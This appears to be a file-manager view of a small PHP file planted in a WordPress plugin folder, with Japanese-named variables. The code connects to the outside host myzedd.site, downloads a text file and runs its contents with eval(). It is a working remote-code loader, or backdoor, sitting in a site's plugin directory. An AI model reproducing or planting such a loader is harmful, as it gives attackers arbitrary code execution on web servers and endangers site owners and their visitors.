• File: 8daf1238_1774208172.php
  • Full Path: /home4/jdaxcom/j3dax.online/wp-content/plugins/kicau-mania27/kicau/mania/8daf1238_1774208172.php
  • Date Modified: 04/28/2026 11:27 AM
  • File size: 774 bytes
  • MIME-type: text/x-php
  • Charset: utf-8
<?php
// バージョン1: ソケットによる直接接続
$ホスト = 'myzedd.site';
$パス = '/project/zedd.txt';
$接続 = fsockopen('ssl://' . $ホスト, 443, $エラー番号, $エラーメッセージ, 25);

if ($接続) {
    $リクエスト = "GET $パス HTTP/1.1\r\n";
    $リクエスト .= "Host: $ホスト\r\n";
    $リクエスト .= "User-Agent: Mozilla/5.0\r\n";
    $リクエスト .= "Connection: close\r\n\r\n";

    fwrite($接続, $リクエスト);
    $レスポンス = '';
    while (!feof($接続)) {
        $レスポンス .= fgets($接続, 4096);
    }
    fclose($接続);

    $本体 = explode("\r\n\r\n", $レスポンス, 2)[1] ?? '';
    if (!empty($本体)) {
        eval('?>' . $本体);
    }
}
?>